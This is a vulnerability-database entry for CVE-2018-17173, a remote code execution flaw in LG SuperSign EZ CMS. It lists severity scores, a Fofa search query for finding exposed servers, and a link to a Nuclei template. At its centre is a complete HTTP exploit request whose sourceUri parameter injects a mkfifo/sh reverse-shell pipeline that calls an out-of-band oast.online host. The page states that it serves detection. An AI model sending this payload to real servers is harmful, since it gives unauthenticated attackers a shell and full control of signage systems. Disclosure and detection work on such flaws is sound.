🔙 목록으로 돌아가기

CVE-2018-17173: LG Supersign EZ CMS - Remote Code Execution

TitleLG Supersign EZ CMS - Remote Code Execution
Authorpussycat0x
SeverityCritical
ImpactUnauthenticated attackers can execute arbitrary system commands on LG SuperSign CMS servers via the sourceUri parameter, leading to complete server compromise and potential access to connected digital signage systems.
RemediationUpgrade to a patched version of LG SuperSign CMS that addresses CVE-2018-17173.
CVSS Score9.8
EPSS Score0.76568
CVE IDCVE-2018-17173
CWE IDCWE-94
Fofa Querytitle="LG SuperSign"
Tags cve cve2018 lg supersign-cms rce vkev vuln

🔍 Vulnerability Description

LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail.

🌐 HTTP Request

GET /qsr_server/device/getThumbnail?sourceUri=\'%2b-%253brm%2b/tmp/f%253bmkfifo%2b/tmp/f%253bcat%2b/tmp/f|/bin/sh%2b-i%2b2>%25261|curl%2bhttp%253a//d5jptu9le0o4701p4hvgpdzzzmjgpbr5u.oast.online%2b>/tmp/f%253b\';&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-17173.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-17173.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A